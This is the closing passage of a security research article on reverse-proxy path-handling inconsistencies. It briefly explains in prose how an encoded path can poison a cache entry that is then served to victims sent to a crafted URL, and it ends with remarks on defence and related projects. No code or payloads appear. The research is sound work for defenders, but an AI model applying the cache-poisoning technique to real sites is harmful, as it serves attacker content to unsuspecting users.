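Because the cache key keeps the raw, encoded path, the poisoned entry never collides with legitimate requests for /account/..., yet anyone the attacker sends to the crafted URL receives the cached payload.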

Conclusion

I have shown several examples of vulnerable configurations for each attack type, but the exact cases are not so important. I wanted to give a fresh look at reverse-proxy-related attacks. If we know how a reverse proxy works, how it processes a request, and how that differs from the backend server, we (as attackers) will be able to reach more endpoints or perform more sophisticated attacks on users.

Regarding protection against such attacks, I see no “silver bullet” here (until we have a really good standard/specification on how to handle a request/path), but I think this project could help defenders as well. If you know your proxy and its limitations, you will be able to change its configuration accordingly.

Due to my desire to share my thoughts and explain things, the article has become very long. Still, I had to skip a bunch of tricks; you can see them in the presentation here. And the most important part of this research is the “raw” results. The research is not finished yet; I will extend it step by step with other software. Pull requests are really appreciated.

While preparing this research, I found several similar projects, including https://github.com/irsdl/httpninja. By combining our projects, it’s possible to get an almost complete matrix of possible inconsistencies.